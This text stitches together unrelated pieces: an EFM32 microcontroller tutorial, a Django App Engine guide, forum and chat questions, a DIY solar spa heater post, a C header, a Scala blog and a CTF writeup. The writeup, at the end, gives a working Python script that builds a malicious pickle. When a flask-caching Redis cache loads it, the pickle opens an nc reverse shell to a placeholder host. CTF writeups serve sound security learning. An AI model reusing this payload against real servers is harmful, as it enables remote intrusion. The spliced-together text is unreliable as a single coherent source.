With the script above, we create a text file rce.txt that, when unpickled by the caching library, will launch a reverse shell. Now, we need to figure out the key name that the caching library uses. I installed the app on my server and used redis-commander to look at the Redis keys. After opening up a cached URL, I found a key named flask_cache_view//test25. Uploading rce.txt under that key name and going to /test25 within 3 seconds spawned a reverse shell! From there, all I had to do was cat the flag.

flag{[email protected]_10rD}

This challenge was worth 450 points, tied with another chall for the highest point-value in the whole CTF. The website was a peer-to-peer chat service where two people who connected to the same URL could chat and message with each other. However, I thought the challenge was broken for the longest time until I figured out it only worked on Firefox for me.
The author reported this to Slack's bug bounty, and they fixed and patched the bug. After finding this article, the path was clear: implement this vulnerability to try to talk with internal services, and somehow leverage those to gain RCE. At this point it was 11 PM. I thought it would be easy: just find the PoC on the bug report, fiddle with it a bit, then ez exploit! But I realized that the author didn't provide a proof of concept????????????? So, I went looking for TURN and STUN implementations and played around with them, but was unable to get anything working. There were only around 12 hours left until the end of the CTF, and we needed a couple hundred more points to be at a safe spot. At this point, my other web partner, Drakon, and I sat down and worked on this script for the next 6 hours. The idea behind the exploit is that when connecting to the TURN server, you send a special packet, XOR-PEER-ADDRESS, which (on an insecure system) proxies the connection to the internal service. However, to get this to work, we needed to build a working TURN client. Here was our implementation of the vulnerability, made by scouring the RFCs and documentation for hours, and by constant trial and error.
import socket
import secrets

TURN_IP = '216.165.2.41'
TURN_PORT = 3478
BUFFER_SIZE = 1024

def constructHeader(message, length, transactionID): # i want to die
    messageTypeList = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    # who the fuck designed this specification
    if message[0] == "allocation":
        messageTypeList[14] = 1
        messageTypeList[15] = 1
    elif message[0] == "connect":
        messageTypeList[12] = 1
        messageTypeList[14] = 1
    elif message[0] == "connectionbind":
        messageTypeList[12] = 1
        messageTypeList[14] = 1
        messageTypeList[15] = 1
    if message[1] == "request":
        # control bits are in the middle of fucking nowhere
        pass
    messageType = ''.join([str(i) for i in messageTypeList]) # 14 bits because why not (two 00 in beginning for padding)
    messageLength = bin(length)[2:].zfill(16) # 16 bits, size of the message in bytes (attributes are padded to multiple of 4 bytes, so the last 2 bits better be zeor you hoe)
    magicCookie = "2112A442" # what the fuck is the point of this
    packet = binToHex(messageType) + binToHex(messageLength) + magicCookie + hex(transactionID)[2:] # mish mash my damn functions
    return packet, transactionID

def constructAttribute(attribute, value):
    if attribute == "REQUESTED-TRANSPORT":
        t = "0019"
        l = "0004"
    elif attribute == "XOR-PEER-ADDRESS":
        t = "0012"
        l = hex(len(value)//2)[2:].zfill(4)
    elif attribute == "CONNECTION-ID":
        t = "002a"
        l = "0004"
    v = value
    return t + l + v

def xorIP(ip, port):
    xip = hex(ipToDec(ip) ^ 0x2112A442)[2:]
    xport = hex(port ^ 0x2112)[2:]
    return xip, xport

def decodeHeader(header):
    messageType = bin(int(header[:4], 16))[2:].zfill(16)
    messageLength = header[4:8]
    magicCookie = header[8:16]
    if magicCookie != "2112a442":
        print("Your cookie is garbage.") # cookie was incorrect
    transactionID = header[16:]
    typeClass = messageType[7] + messageType[11]
    if typeClass == "00":
        typeClass = "request"
    elif typeClass == "01":
        typeClass = "indication"
    elif typeClass == "10":
        typeClass = "success response"
    elif typeClass == "11":
        typeClass = "error response"
    else:
        typeClass = "CRITICAL ERROR" # idk how this even happens
    method = hex(int(messageType[:7] + messageType[8:11] + messageType[11:], 2))
    return (messageLength, int(transactionID, 16), typeClass, method)

def decodeMessage(message):
    i = 0
    returnArr = []
    while i < len(message):
        t = message[i:i+4]
        l = int(message[i+4:i+8], 16) * 2
        v = message[i+8:i+l+8]
        i += l + 8
        if t == "0016":
            t = "XOR-RELAYED-ADDRESS"
            v = parseIP(v)
        elif t == "0020":
            t = "XOR-MAPPED-ADDRESS"
            v = parseIP(v)
        elif t == "0012":
            t = "XOR-PEER-ADDRESS"
            v = parseIP(v)
        elif t == "000d":
            t = "LIFETIME"
            v = int(v, 16) # in seconds
        elif t == "8022":
            t = "SOFTWARE"
            v = bytearray.fromhex(v).decode()
        elif t == "002a":
            t = "CONNECTION-ID"
            v = int(v, 16)
        elif t == "0009":
            t = "ERROR-CODE"
            errorClass = str(int(v[:6]))
            errorNumber = v[6:8]
            error = bytearray.fromhex(v[8:]).decode()
            v = (errorClass + errorNumber + ": " + error)
        returnArr.append((t, l, v))
    return returnArr

def binToHex(fuck): # fuck packets
    fuckList = [hex(int(fuck[4*i:4*(i+1)], 2))[2:] for i in range(0, len(fuck)//4)]
    return ''.join(fuckList)

def hexToIP(why):
    octets = [str(int(why[2*i:2*(i+1)], 16)) for i in range(0, 4)]
    return '.'.join(octets)

def ipToDec(no):
    octets = no.split(".")
    return int(''.join([hex(int(octet))[2:].zfill(2) for octet in octets]), 16)

def parseIP(v):
    family = v[2:4] # parse the stuff for QoL
    if family == "01":
        family = "IPv4"
    else:
        family = "IPv6"
    port = str(int(v[4:8], 16) ^ 0x2112)
    ip = hexToIP(hex(int(v[8:], 16) ^ 0x2112A442)[2:])
    return (family, ip + ":" + port)

transactionID = secrets.randbits(96) # it's a fucking uid why does it need to be cryptographically secure

# initial allocation request
HEADER = constructHeader(("allocation", "request"), 8, transactionID)
print("Transaction ID is " + str(HEADER[1])) # log the id in case
packet = HEADER[0] + constructAttribute("REQUESTED-TRANSPORT", "06000000")
MESSAGE = bytearray.fromhex(packet)
#print(MESSAGE)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TURN_IP, TURN_PORT))
s.send(MESSAGE)
data = s.recv(BUFFER_SIZE)
hexData = bytearray(data).hex()
#print(hexData)
print(decodeHeader(hexData[:40]))
print(decodeMessage(hexData[40:]))

data = xorIP("0.0.0.0", INTERNAL_PORT)
HEADER = constructHeader(("connect", "request"), len("0001" + data[1] + data[0])//2 + 4, transactionID)
packet = HEADER[0] + constructAttribute("XOR-PEER-ADDRESS", "0001" + data[1] + data[0])
MESSAGE = bytearray.fromhex(packet)
#print(MESSAGE)
s.send(MESSAGE)
data = s.recv(BUFFER_SIZE)
hexData = bytearray(data).hex()
#print(hexData)
print(decodeHeader(hexData[:40]))
print(decodeMessage(hexData[40:]))
connectionID = decodeMessage(hexData[40:])[0][2]
print(connectionID)
print("establishing new connection...\n")

# -----------------------------------------------
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((TURN_IP, TURN_PORT))
HEADER = constructHeader(("connectionbind", "request"), 8, transactionID)
packet = HEADER[0] + constructAttribute("CONNECTION-ID", hex(connectionID)[2:].zfill(8))
MESSAGE = bytearray.fromhex(packet)
#print(MESSAGE)
s2.send(MESSAGE)
data = s2.recv(BUFFER_SIZE)
hexData = bytearray(data).hex()
#print(hexData)
#print(decodeHeader(hexData[:40]))
#print(decodeMessage(hexData[40:]))

(Note: this script is still very buggy, and there was stuff we fixed after the CTF, but this was what we used at the time.) Now, with this script, we could change the port on the line data = xorIP("0.0.0.0", INTERNAL_PORT) to connect to whatever internal service we wanted! (Side note: around 4 AM we tried 127.0.0.1 for localhost, which gave us 403 Forbidden Address errors. I almost cried at this point, but I luckily tried 0.0.0.0, and it worked!) After trying some of the common ports, we located a Redis database on port 6379. Our plan was now to connect to the internal Redis database, and somehow exploit it to gain RCE. We found this exploit to gain RCE on a Redis database.
The idea behind it was to set up a Redis database on your own computer, load a module which allowed the usage of shell commands, and then synchronize the local and target Redis databases using a MASTER/SLAVE system. However, after ~8 hours of working on it I couldn't get it going, so I went to bed. When I woke up, EhhThing and I worked on it more, and eventually got it to work! The following script was appended to the bottom of the previous solve script, with INTERNAL_PORT set to 6379:

s2.send(b'CONFIG SET dir /tmp/\r\n')
print(s2.recv(4096).decode())
s2.send(b'CONFIG SET dbfilename dadadadad.so\r\n')
print(s2.recv(4096).decode())
s2.send(b'SLAVEOF 3.96.190.161 1111\r\n')
print(s2.recv(4096).decode())
time.sleep(5)
s2.send(b'MODULE LOAD /tmp/dadadadad.so\r\n')
print(s2.recv(4096).decode())
s2.send(b"SLAVEOF NO ONE\r\n")
print(s2.recv(4096).decode())
s2.send(b"system.exec ls\r\n")
print(s2.recv(4096).decode())
s2.send(b"system.exec cat /flag.txt\r\n")
print(s2.recv(4096).decode())

And, after more than 10 hours of work, we got the flag!

flag{[email protected]_all?}
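For reference, the address obfuscation that the script's xorIP/parseIP helpers deal with is nothing mysterious: STUN's XOR-*-ADDRESS attributes just XOR the raw port and IPv4 address against the fixed magic cookie 0x2112A442 (RFC 5389). A standalone round-trip sketch:

```python
MAGIC_COOKIE = 0x2112A442

def xor_addr(ip, port):
    # encode an IPv4 address/port the way XOR-MAPPED-ADDRESS expects
    ip_int = int.from_bytes(bytes(int(o) for o in ip.split(".")), "big")
    return ip_int ^ MAGIC_COOKIE, port ^ (MAGIC_COOKIE >> 16)

def unxor_addr(xip, xport):
    # decode is the same operation, since XOR is its own inverse
    ip_int = xip ^ MAGIC_COOKIE
    ip = ".".join(str(b) for b in ip_int.to_bytes(4, "big"))
    return ip, xport ^ (MAGIC_COOKIE >> 16)

xip, xport = xor_addr("127.0.0.1", 6379)
print(hex(xip), hex(xport))   # -> 0x5e12a443 0x39f9
print(unxor_addr(xip, xport)) # -> ('127.0.0.1', 6379)
```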
https://brycec.me/posts/csaw2020quals_writeups
Sencha Cmd 3.1.0.239 and ExtJS 4.2 theme questions using SASS

After you generate a theme, in the package directory there should be a sass/etc, sass/src and sass/var. Are your SASS files in them? I haven't had a problem getting the package to build. FYI, we are prepping the docs for when the Cmd 3.1 GA comes out for all to see.

I see those 3 folders, but the sass/var & sass/src only have a Readme.md file and no other files. The sass/etc has a Readme.md & all.scss file. The problem is the all.scss file is blank when I open it. I tried adding my SASS code from my previous app.scss file into the all.scss, but then when I build I get errors. Should all of these folders have a default SASS file with some starting code in them?

No, they are blank directories (besides the readme), since when you create a package it's a default package and may or may not be a theme.

Is there a documentation or sample scss file to begin customizing a Theme via the new packages using SASS? In the previous version there was an app.scss file that included default SASS code like this.

Code:
@import 'ext4/default/all';
// You may remove any of the following modules that you do not use in order to create a smaller css-splitter;

Code:
// Grid Row
$grid-row-cell-over-background-color: $very_light_blue;
$grid-row-cell-alt-background: $extremely_light_blue;

// Button
$button-default-background-gradient: 'glossy-button' !default;
My custom scss files which i placed in the theme package etc folder and included them are not interpreted and not in the mytheme.css So same question how to include custom scss in the theme package?trainings / workshops / consulting: Sencha Touch / Ext JS Profile on SenchaDevs www: twitter: nilsdehl meetup: Sencha Touch / Ext JS Meetup Frankfurt videos: conference photos: My theme extends ext-theme-access. Copy from there sass/etc,sass/src,/sass/var as 'london_lawyer' described in Thread Sencha CMD - Theme Creation/Editing #6 for the grid-row change in: ..packages/mytheme/sass/var/panel/table.scss mitchellsimoens, Where are you gonna announce the new documentation for CMD 3.1 & package management ? I need to customize Neptune. I don't want to mess around without official documentation. I guess lot of people is waiting for docs, as well. Any release date ? Thanks.Using Ext with cachefly Working on LAMPExt Heads down on the docs now. In a nutshell to the above questions, the structure of SASS src and var folders is class-oriented. If you check out ext-theme-neptune you will see it has things like this: ./sass/var/grid/plugin/RowExpander.scss ./sass/src/grid/plugin/RowExpander.scss The organization of these is an exact mirror of the JavaScript classes to which they apply. In this case "Ext.grid.plugin.RowExpander". There is a config variable for packages (called package.sass.namespace) and for apps (called app.sass.namespace) that determines the JavaScript namespace that corresponds to the top-level folder. In theme packages, "package.sass.namespace=Ext" is the default. This means we don't need an "Ext" folder in ./sass/var and ./sass/src. To theme at the global scope, you would need to set this var to blank and create folders starting at the global namespace. 
Looking in the first file we see just this: Code: $row-expander-margin: 3px 3px 3px 3px !default; $row-expander-height: 11px !default; $row-expander-width: 11px !default; All files in var folders are included by "sencha package build" and "sencha app build" when building SASS. Within a package these files are ordered from base class to derived class as you might expect. The ./sass/src folder works similarly except that only the scss files for classes needed by the build (when building an app) are included. Within a package, these files are also included from base to derived order. Across packages, the base theme ./sass/src files come before those of the derived theme. This allows the cascade to always favor the derived theme. So you might see files like RowExpander.scss appear in many of the ./sass/var and ./sass/src across different themes. Each theme contributing its part. Obviously, if you have nothing to say about the variables or rules, you don't need to have a file in your theme. To carry forward more monolithic theme code without restructuring all the pieces to be class oriented, you can place your variables in ./sass/var/Component.scss or ./etc/all.scss (since that comes in even before vars) but vars is more appropriate for setting variables. You rules and other logic can go in ./sass/src/Component.scss as this will follow all of the base theme src such as its mixins. I hope this helps answer your questions. The Ext JS 4.2 RC1 release notes have some more on this -. ... back to the guide smithing....Don Griffin Ext JS Development Team Lead Check the docs. Learn how to (properly) report a framework issue and a Sencha Cmd issue "Use the source, Luke!" Thanks a lot. 
Now I have a much better idea.Using Ext with cachefly Working on LAMPExt Thread Participants: 17 - mysticav (2 Posts) - pmarko (1 Post) - mitchellsimoens (2 Posts) - mono blaine (2 Posts) - mrsunshine (1 Post) - gevik (1 Post) - dongryphon (8 Posts) - existdissolve (4 Posts) - zerosector (1 Post) - HriBB (1 Post) - asti (1 Post) - chrisjunkie (1 Post) - icheasty (1 Post) - svper (1 Post) - AwesomeBobX64 (1 Post) - twcarter (1 Post) - dwils (1 Post)
http://www.sencha.com/forum/showthread.php?258992
Coding Utils¶

Evennia comes with many utilities to help with common coding tasks. Most are accessible directly from the flat API, otherwise you can find them in the evennia/utils/ folder.

Searching¶

A common thing to do is to search for objects. The most common time one needs to do this is inside a command body. There it's easiest to use the search method defined on all objects. This will search for objects in the same location and inside the caller:

obj = self.caller.search(objname)

Give the keyword global_search=True to extend the search to encompass the entire database. Aliases will also be matched by this search. You will find multiple examples of this functionality in the default command set. If you need to search for objects in a code module you can use the functions in evennia.utils.search. You can access these as shortcuts evennia.search_*.

from evennia import search_object
obj = search_object(objname)

Note that these latter methods will always return a list of results, even if the list has one or zero entries.

Create¶

Apart from the in-game build commands (@create etc), you can also build all of Evennia's game entities directly in code (for example when defining new create commands).

import evennia

myobj = evennia.create_object("game.gamesrc.objects.myobj.MyObj", key="MyObj")
myscr = evennia.create_script("game.gamesrc.scripts.myscripts.MyScript", obj=myobj)
helpentry = evennia.create_help_entry("Emoting", "Emoting means that ...")
msg = evennia.create_message(senderobj, [receiverobj], "Hello ...")
channel = evennia.create_channel("news")
account = evennia.create_account("Henry", "henry@test.com", "H@passwd")

Each of these create-functions has a host of arguments to further customize the created entity. See evennia/utils/create.py for more information.

Logging¶

Normally you can use Evennia's logger, which will create proper logs either to the terminal or to a file.
from evennia import logger

logger.log_err("This is an Error!")
logger.log_warn("This is a Warning!")
logger.log_info("This is normal information")
logger.log_dep("This feature is deprecated")

There is a special log-message type, log_trace(), that is intended to be called from inside a traceback - this can be very useful for relaying the traceback message back to the log without having it kill the server.

try:
    # [some code that may fail...]
except Exception:
    logger.log_trace("This text will show beneath the traceback itself.")

The log_file logger, finally, is a very useful logger for outputting arbitrary log messages. This is a heavily optimized asynchronous log mechanism using threads to avoid overhead. You should be able to use it for very heavy custom logging without fearing disk-write delays.

logger.log_file(message, filename="mylog.log")

If no absolute path is given, the log file will appear in the mygame/server/logs/ directory. If the file already exists, it will be appended to. Timestamps in the same format as the normal Evennia logs will be automatically added to each entry. If a filename is not specified, output will be written to the file game/logs/game.log.

Game time¶

Evennia tracks the current server time. You can access this time via the evennia.gametime shortcut:

from evennia import gametime

# all the functions below return times in seconds

# total running time of the server
runtime = gametime.runtime()
# time since latest hard reboot (not including reloads)
uptime = gametime.uptime()
# server epoch (its start time)
server_epoch = gametime.server_epoch()
# in-game epoch (this can be set by `settings.TIME_GAME_EPOCH`;
# if not, the server epoch is used)
game_epoch = gametime.game_epoch()
# in-game time passed since time started running
gametime = gametime.gametime()
# in-game time plus game epoch (i.e. the current in-game time stamp)
gametime = gametime.gametime(absolute=True)
# reset the game time (back to game epoch)
gametime.reset_gametime()

The setting TIME_FACTOR determines how fast/slow in-game time runs compared to the real world. The setting TIME_GAME_EPOCH sets the starting game epoch (in seconds). The functions from the gametime module all return their times in seconds. You can convert this to whatever units of time you desire for your game. You can use the @time command to view the server time info. You can also schedule things to happen at specific in-game times using the gametime.schedule function:

import evennia
from evennia import gametime

def church_clock():
    limbo = evennia.search_object(key="Limbo")[0]
    limbo.msg_contents("The church clock chimes two.")

gametime.schedule(church_clock, hour=2)

utils.time_format()¶

This function takes a number of seconds as input (e.g. from the gametime module above) and converts it to a nice text output in days, hours etc. It's useful when you want to show how old something is. It converts to four different styles of output using the style keyword:

- style 0 - 5d:45m:12s (standard colon output)
- style 1 - 5d (shows only the longest time unit)
- style 2 - 5 days, 45 minutes (full format, ignores seconds)
- style 3 - 5 days, 45 minutes, 12 seconds (full format, with seconds)

utils.inherits_from()¶

This useful function takes two arguments - an object to check and a parent. It returns True if the object inherits from the parent at any distance (as opposed to Python's in-built isinstance(), which will only catch immediate dependence). This function also accepts as input any combination of classes, instances or python-paths-to-classes. Note that Python code should usually work with duck typing. But in Evennia's case it can sometimes be useful to check if an object inherits from a given Typeclass as a way of identification. Say for example that we have a typeclass Animal. This has a subclass Felines, which in turn has a subclass HouseCat.
Maybe there are a bunch of other animal types too, like horses and dogs. Using inherits_from will allow you to check for all animals in one go:

from evennia import utils

if utils.inherits_from(obj, "typeclasses.objects.animals.Animal"):
    obj.msg("The bouncer stops you in the door. He says: 'No talking animals allowed.'")

utils.delay()¶

This is a thin wrapper around a Twisted construct called a deferred. It simply won't return until a given number of seconds have passed, at which time it will trigger a given callback with whatever argument. This is a small and lightweight (non-persistent) alternative to a full Script. Contrary to a Script it can also handle sub-second timing precision (although this is not something you should normally need to worry about).

Some text utilities¶

In a text game, you are naturally doing a lot of work shuffling text back and forth. Here is a non-complete selection of text utilities found in evennia/utils/utils.py (shortcut evennia.utils). If nothing else it can be good to look here before starting to develop a solution of your own.

utils.fill()¶

This flood-fills a text to a given width (shuffles the words to make each line evenly wide). It also indents as needed.

outtxt = fill(intxt, width=78, indent=4)

utils.crop()¶

This function will crop a very long line, adding a suffix to show the line actually continues. This can be useful in listings when showing multiple lines would mess things up.

intxt = "This is a long text that we want to crop."
outtxt = crop(intxt, width=19, suffix="[...]")
# outtxt is now "This is a long text[...]"

utils.dedent()¶

This solves what may at first glance appear to be a trivial problem with text - removing indentation. It is used to shift entire paragraphs to the left, without disturbing any further formatting they may have. A common case for this is when using Python triple-quoted strings in code - they will retain whichever indentation they have in the code, and to make easily-readable source code one usually doesn't want to shift the string to the left edge.
A common case for this is when using Python triple-quoted strings in code - they will retain whichever indentation they have in the code, and to make easily-readable source code one usually don’t want to shift the string to the left edge. #python code is entered at a given indentation intxt = """ This is an example text that will end up with a lot of whitespace on the left. It also has indentations of its own.""" outtxt = dedent(intxt) # outtxt will now retain all internal indentation # but be shifted all the way to the left. Normally you do the dedent in the display code (this is for example how the help system homogenizes help entries). text conversion()¶ Evennia supplies two utility functions for converting text to the correct encodings. to_str() and to_unicode(). The difference from Python’s in-built str() and unicode() operators are that the Evennia ones makes use of the ENCODINGS setting and will try very hard to never raise a traceback but instead echo errors through logging. See here for more info. Making ascii tables¶ The EvTable class ( evennia/utils/evtable.py) can be used to create correctly formatted text tables. There is also EvForm ( evennia/utils/evform.py). This reads a fixed-format text template from a file in order to create any level of sophisticated ascii layout. Both evtable and evform have lots of options and inputs so see the header of each module for help. The third-party PrettyTable module is also included in Evennia. PrettyTable is considered deprecated in favor of EvTable since PrettyTable cannot handle ANSI colour. PrettyTable can be found in evennia/utils/prettytable/. See its homepage above for instructions.
http://evennia.readthedocs.io/en/latest/Coding-Utils.html
Is there a good reason to not Unix-style mangle your From line in an SMTP email header?

For context, I've been looking at several examples lately of ways to properly send email potentially containing UTF-8 characters to email addresses also potentially containing UTF-8 characters, from Python 2.7 using smtplib. One thing I came across in a few examples was people electing to use a From-mangling behavior. My understanding is that this mangling behavior (converting "From" to ">From") is in place in order to ensure compatibility with various Unix systems. (I enjoyed reading the ranting explanations of this mangling behavior from the Unix Haters mailing list, for anyone interested in the reasoning behind this behavior.) According to the Python 2.7 docs on generating MIME documents, mangling the From line in this way...

[...] is the only guaranteed portable way to avoid having such lines be mistaken for a Unix mailbox format envelope header separator

So, I want to know if there is a good reason to adopt not mangling the From header as a best practice. Does anyone have any experience with this?

- HTML Emails - Creating 20 versions by data?

Every week, I send out an email with 20 versions. The only difference in each version is a set of data (a name, email address and telephone number). At the moment, I create the 20 versions and enter this manually, but the dream is to generate one email and use variables to pull in the data externally and populate 20 versions. The issue I have is that the 20 versions all need to be external .html files, which would have the variables already entered on build. So if I had a variable [telephone], this would be 1234567890 on version 1, 123456778 on version 2, etc. I assume this would be a custom build, but if anyone has an idea of a starting point that'd be awesome!
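Back to the mangling question above: the behavior is easy to see with the standard library, and worth noting is that it applies to lines in the message body that begin with "From " (which would otherwise look like mbox envelope separators), not to the From: header itself. A Python 3 sketch:

```python
import io
from email.generator import Generator
from email.message import Message

msg = Message()
msg["From"] = "alice@example.com"
msg.set_payload("From here on, things get interesting.\nNothing else mangled.")

buf = io.StringIO()
# mangle_from_=True rewrites body lines starting "From " as ">From "
Generator(buf, mangle_from_=True).flatten(msg)
print(buf.getvalue())
# The body line now starts ">From here on, ..." while the
# "From: alice@example.com" header is untouched.
```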
- Sending mail through SMTP with different email from different account

I am sending emails using an SMTP server in my ASP.NET MVC application; find the code I have used below:

MailMessage Msg = new MailMessage();
Msg.From = new MailAddress("MyAccount@company.com"); // same

The above code works fine, but I need to send email from a different From address with the same credentials, like below:

MailMessage Msg = new MailMessage();
Msg.From = new MailAddress("anotherAccount@company.com"); // different

This returns the error message:

Additional information: Mailbox unavailable. The server response was: 5.7.60 SMTP; Client does not have permissions to send as this sender

Is it possible to send like this using the above code? Anything I missed? Thanks, Nagaraj M.

- Execl in unix system

My question is about execl. Let's say I create one process, and in that process I call fork(). Then I start a new program with execl() in the fork. My question is: if I call getppid() in execl's program, what will I get, the init id or the shell id? Thank you for answers.

- In shell script to find and replace string in file using variable?

I want a shell script to find my 'Orignal_literal' and change it with a dynamic literal; this literal would be runtime input to the script.

- macOS oddly kernel panic (likely Darwin XPC related)

Configuration: MacBook Pro 11,5 with macOS 10.13.1 (FileVault enabled). On Nov 13, after I left the computer for 20 minutes, it was unable to wake from sleep. I halted it and investigated the software 4 days later. Some log information pointed out that it's likely caused by Darwin XPC. Just 2 weeks ago, I entered Recovery OS and copied sleepimage (on disk1s4) to the desktop. When I tried to open it using a hex editor, it prompted "XPC_SERVICE_CORE" in the filename, then crashed. I zipped it, and the .zip package is only 1M in size! I think this may be only a symbol file and that it caused the kernel panic.
I'm not an expert on Darwin, so I zipped and uploaded /var/log/ and sleepimage, and am asking for help. Thanks!

- Windows C++ multibyte / unicode

In Windows C++ multibyte/unicode considerations, I notice that _tcslen() and lstrlen() both provide a string's length correctly regardless of whether you're compiling for multibyte or Unicode. _tcslen() is defined in TCHAR.H based on the define _UNICODE, and lstrlen() is defined in WINBASE.H based on the define UNICODE. Did someone just re-invent the wheel at some point, or is there a reason for this apparent duplication?

- Displaying unicode characters from its decimal or hexa value

I have tried different methods with different encodings like UTF-8 and ISO_8859_1 to correctly display unicode characters. To no avail. Here is a unit test that shows some of the things I tried. I appreciate your insight.

@Test
public void unicode_conversation_isCorrect() throws Exception {
    int decimalHi = 1202;
    int hexaHi = 0x4B2;
    String unicodeHi = Integer.toString(decimalHi);
    unicodeHi = "\\u" + unicodeHi;
    String unicodeHiHex = Integer.toHexString(hexaHi);
    String ethiopicHi = "\u1202";
    char[] decCharArray = Character.toChars(decimalHi);
    String deciStr = "";
    for (char c : decCharArray) {
        deciStr = deciStr + c;
    }

    assertEquals("ሂ", "\u1202");   //succeeds
    assertEquals("ሂ", ethiopicHi); //succeeds
    assertEquals("ሂ", deciStr);    //fails. Expected :ሂ Actual :Ҳ
    assertEquals("ሂ", unicodeHi);  //fails. Expected :ሂ Actual :\u1202
}

- Compare iterated character from std::string with unicode C++

I've been struggling with this problem for quite some time, and this is basically my first time dealing with Unicode or UTF-8. This is what I'm trying to do: I just want to iterate over a std::string containing a combination of normal alphabet characters and a unicode symbol, which in my case is the en dash "–".
more info: This is the code that I've tried, and it won't compile:

#include <iostream>
#include <string>

int main() {
    std::string str = "test string with symbol – and !";
    for (auto &letter : str) {
        if (letter == "–") {
            std::cout << "found!" << std::endl;
        }
    }
    return 0;
}

This is the result of my compiler:

main.cpp: In function 'int main()':
main.cpp:18:23: error: ISO C++ forbids comparison between pointer and integer [-fpermissive]
     if (letter == "–") {
                       ^

Also, when I was looking through the internet I found some interesting information for this type of task: How to search a non-ASCII character in a c++ string? But when I tried to modify my code with those UTF-8 hex codes, it also won't compile:

    if (letter == "\xE2\x80\x93") {
        std::cout << "found!" << std::endl;
    }

with the exact same message from my compiler, which is "c++ forbids comparison between pointer and integer". Did I miss something? Or do I need to use libraries like ICU or Boost? Your help is much appreciated. Thank you!

Update: based on the answer from UnholySheep, I've been improving my code, but it still doesn't work. It passes compilation, but when I run it, it never outputs "found!". So, how do I solve this? Thank you.

- Failed Gmail authentication through smtplib and AWS Lambda

I'm trying to write an AWS Lambda function that periodically sends an email using Python's smtplib. This function works outside of AWS Lambda, and I've verified that the environment variables are valid many times.

import os
import smtplib

def lambda_handler(event, context):
    """Function that runs to send the email."""
    otf_email = os.environ.get("OTF_EMAIL")
    my_email = os.environ.get("MY_EMAIL")
    pw = os.environ.get("GMAIL_PW")
    body = 'Subject:\nThis is a test from the AWS lambda function.'
    smtp_obj = smtplib.SMTP('smtp.gmail.com', 587)
    smtp_obj.ehlo()
    smtp_obj.starttls()
    smtp_obj.login(my_email, pw)
    smtp_obj.sendmail(my_email, otf_email, body)
    smtp_obj.sendmail(my_email, my_email, body)
    smtp_obj.quit()

The first part of the error:

"errorMessage": "(534, b'5.7.14 <\\n5.7.14 vlSLqK014L_ddv0GicpBkQ1o229bk_zYZe8gMUGlddfJLox0EnXFwtUl9GpBygMxCzoATW\\n5.7.14 3UjdqLIvkTcUx6vGO09gE33_CMkdMaVK-F1d8FC4SypPh8n3ft6BaZubjr4b_M7FD2roiN\\n5.7.14 LyTNxCogmPGDqNQP8overGbbDNTZ7rdeEGBYqG9dExVjtqnRda6eEwC9e9Ib8zHfsjASRM\\n5.7.14 Zi8ShH9zxelYTJ-IhALwvPFV0pJIg> Please log in via your web browser and\\n5.7.14 then try again.\\n5.7.14 Learn more at\\n5.7.14 u131sm4947518pgc.89 - gsmtp')"

- smtplib.SMTP.sendmail raise exception but its str is (250, 'ok')

try:
    if not self.check_smtp_connected("main", self.sender_addr):
        self.close("main", self.sender_addr)
        if not self.connect("main", self.sender_addr):
            self.last_error = "req_id:%d,connect to %s main failed" % (mail_id, self.name)
            raise Exception("req_id:%d,connect to %s main failed" % (mail_id, self.name))
    sender_addr = parseaddr(self.msg['From'])[1]
    recv_addr = parseaddr(self.msg['To'])[1]
    self.smtp_conns[self.sender_addr].sendmail(self.msg['From'], self.msg['To'], self.msg.as_string())
except Exception as e:
    glogger.warning("req_id:%d,send mail by %s failed, error: %s" % (mail_id, self.name, str(e)))
else:
    sent_succ = True
    break

check_smtp_connected uses noop()[0] to check the connection to the SMTP server. The first time, I get:

req_id:7066283,send mail by tx_smtp failed, error: timed out

so the exception is a timeout, and then I use check_smtp_connected to check the connection; it's broken. The second time, I get:

req_id:7066283,send mail by tx_smtp failed, error: (250, 'Ok')

so the exception is (250, 'Ok'). I read the source code of sendmail, but can't find the branch that would raise this exception, so I'm heavily puzzled. And the result is that my mailbox gets two mails.
http://quabr.com/47297103/is-there-a-good-reason-to-not-unix-style-mangle-your-from-line-in-an-smtp-email
CC-MAIN-2017-47
refinedweb
1,520
58.18
I am receiving this message when trying to execute the script, whether in a virtual environment or a normal Python shell:

File "/home/pi/facesample1.py", line 10, in <module>
    gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
error: /home/pi/opencv-3.1.0/modules/imgproc/src/color.cpp:8000: error: (-215) scn == 3 || scn == 4 in function cvtColor

import cv2

#Load an image from file
image = cv2.imread("fronthead.jpg", 1)

#Load a cascade file for detecting faces
face_cascade = cv2.CascadeClassifier('/usr/share/opencv,0,0),2)

#Save the result image
cv2.imwrite('camresult.jpg',image)

Your image variable is apparently not a 3- or 4-channel image; thus, cvtColor() is unable to transform it to grayscale. Check image.shape and see that it returns something with the right dimensions (i.e. a 3D array with last dimension 3 or 4). It is also quite possible that image is None, which usually means that the path to the file is wrong.
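To act on the answer's advice before calling cvtColor, it helps to fail fast with a clear message. cv2 isn't needed to illustrate the check itself; this hypothetical helper mirrors the (-215) scn == 3 || scn == 4 assertion. You would call it with image.shape, or with None when cv2.imread returned None (which is what it does for a bad path):

```python
def ensure_color_image(shape):
    """Raise unless `shape` is a 3-D (H, W, C) shape with 3 or 4 channels,
    mirroring cvtColor's `scn == 3 || scn == 4` assertion."""
    if shape is None or len(shape) != 3 or shape[2] not in (3, 4):
        raise ValueError("expected an HxWx3 or HxWx4 image, got shape %r" % (shape,))
    return True

print(ensure_color_image((480, 640, 3)))  # True
# A grayscale (2-D) image, or a missing one, is rejected:
try:
    ensure_color_image((480, 640))
except ValueError as e:
    print("rejected:", e)
```

Guarding the script with this kind of check turns the cryptic C++ assertion into an error that points at the real cause (wrong file path or already-grayscale input).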
https://codedump.io/share/CDFOmB1547Sp/1/raspberry-pi-3-python-and-opencv-for-facial-recognition
First of all, my English's very poor, sorry. I wanted to know if there is any way to transform what you paint in a panel into an image you can save. I want to use the functions to draw rectangles, which draw them in a panel, instead of using the functions that paint pixel by pixel.

picture :: Window a -> Var Color -> Var Color -> Var Color -> Var Color -> Var Color -> Var Int -> Var Int -> Var Int -> Var Int -> Var Int -> IO ()
picture w cl1 cl2 cl3 cl4 current alt anc num altr ancr
...
    let rgbSize = sz an al
    im <- imageCreateSized rgbSize
    imv <- varCreate im
    bim <- bitmapCreateDefault
    bimv <- varCreate bim
...
